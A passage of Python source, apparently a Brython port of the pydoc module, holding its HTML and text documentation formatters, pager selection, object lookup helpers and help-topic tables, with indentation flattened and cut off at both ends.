"""Produce HTML documentation for a class object."""
print('docclass')
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value, name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if callable(value) or inspect.isdatadescriptor(value):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = [(name, kind, cls, value)
for name, kind, cls, value in classify_class_attrs(object)
if visiblename(name, obj=object)]
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
pass
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is builtins.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
attrs.sort(key=lambda t: t[0])
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % ', '.join(parents)
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
        doc = doc and '<tt>%s<br>&nbsp;</tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.__self__.__class__
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.__self__ is not None:
note = ' method of %s instance' % self.classlink(
object.__self__.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.__func__
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
            args, varargs, varkw, defaults, kwonlyargs, kwdefaults, ann = \
                inspect.getfullargspec(object)
            argspec = inspect.formatargspec(
                args, varargs, varkw, defaults, kwonlyargs, kwdefaults, ann,
                formatvalue=self.formatvalue,
                formatannotation=inspect.formatannotationrelativeto(object))
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
# XXX lambda's won't usually have func_annotations['return']
            # since the syntax doesn't support it, but it is possible.
# So removing parentheses isn't truly safe.
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
if any((0xD800 <= ord(ch) <= 0xDFFF) for ch in name):
# ignore a module if its name contains a surrogate character
continue
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
#def repr1(self, x, level):
# if hasattr(type(x), '__name__'):
# methodname = 'repr_' + '_'.join(type(x).__name__.split())
# if hasattr(self, methodname):
# return getattr(self, methodname)(x, level)
# return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return ''.join(ch + '\b' + ch for ch in text)
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = [prefix + line for line in text.split('\n')]
if lines: lines[-1] = lines[-1].rstrip()
return '\n'.join(lines)
def section(self, title, contents):
"""Format a section with a given heading."""
clean_contents = self.indent(contents).rstrip()
return self.bold(title) + '\n' + clean_contents + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = (classname(c, modname) for c in bases)
result = result + '(%s)' % ', '.join(parents)
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
all = getattr(object, '__all__', None)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE REFERENCE', docloc + """
The following documentation is automatically generated from the Python
source files. It may be incomplete, incorrect or include features that
are considered implementation detail and may vary between Python
implementations. When in doubt, consult the module reference at the
location listed above.
""")
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', '\n'.join(modpkgs))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', '\n'.join(submodules))
if classes:
classlist = [value for key, value in classes]
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', '\n'.join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', '\n'.join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', '\n'.join(contents))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = version[11:-1].strip()
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % ', '.join(parents)
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value,
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if callable(value) or inspect.isdatadescriptor(value):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = [(name, kind, cls, value)
for name, kind, cls, value in classify_class_attrs(object)
if visiblename(name, obj=object)]
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is builtins.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(contents.rstrip(), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.__self__.__class__
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.__self__ is not None:
note = ' method of %s instance' % classname(
object.__self__.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.__func__
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults, kwonlyargs, kwdefaults, ann = \
inspect.getfullargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, kwonlyargs, kwdefaults, ann,
formatvalue=self.formatvalue,
formatannotation=inspect.formatannotationrelativeto(object))
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
# XXX lambda's won't usually have func_annotations['return']
            # since the syntax doesn't support it, but it is possible.
# So removing parentheses isn't truly safe.
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and self.indent(doc).rstrip() + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
class _PlainTextDoc(TextDoc):
"""Subclass of TextDoc which overrides string styling"""
def bold(self, text):
return text
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if not hasattr(sys.stdout, "isatty"):
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(text)
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(text)
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = plain(text).split('\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
        r = inc = int(os.environ.get('LINES', 25)) - 1
sys.stdout.write('\n'.join(lines[:inc]) + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + '\n'.join(lines[r:r+inc]) + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(plain(text))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in path.split('.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport('.'.join(parts[:n+1]), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
else:
object = builtins
for part in parts[n:]:
try:
object = getattr(object, part)
except AttributeError:
return None
return object
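# Illustrative sketch (not part of the original module): locate() resolves a
# dotted path by importing progressively deeper modules.
def _demo_locate():
    assert locate('os.path') is os.path
    assert locate('builtins') is builtins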
# --------------------------------------- interactive interpreter interface
text = TextDoc()
plaintext = _PlainTextDoc()
html = HTMLDoc()
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError('no Python documentation found for %r' % thing)
return object, thing
else:
name = getattr(thing, '__name__', None)
return thing, name if isinstance(name, str) else None
def render_doc(thing, title='Python Library Documentation: %s', forceload=0,
renderer=None):
"""Render text documentation, given an object or a path to an object."""
if renderer is None:
renderer = text
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + renderer.document(object, name)
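# Illustrative sketch (not part of the original module): render_doc() accepts
# an object or a dotted name and returns the formatted page as a string.
def _demo_render_doc():
    page = render_doc('os.path', renderer=plaintext)
    assert page.startswith('Python Library Documentation')
    return page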
def doc(thing, title='Python Library Documentation: %s', forceload=0,
output=None):
"""Display text documentation, given an object or a path to an object."""
try:
if output is None:
pager(render_doc(thing, title, forceload))
else:
output.write(render_doc(thing, title, forceload, plaintext))
except (ImportError, ErrorDuringImport) as value:
print(value)
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w', encoding='utf-8')
file.write(page)
file.close()
print('wrote', name + '.html')
except (ImportError, ErrorDuringImport) as value:
print(value)
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/sphinxext/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'False': '',
'None': '',
'True': '',
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'nonlocal NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'nonlocal': ('nonlocal', 'global NAMESPACES'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "b'", '"""', '"', 'r"', 'b"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.items():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING range LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS MAPPINGMETHODS '
'NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global nonlocal ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'CONVERSIONS': ('conversions', ''),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS NUMBERS TUPLELITERALS '
'LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
#fix me brython
self.input = self._input or sys.stdin
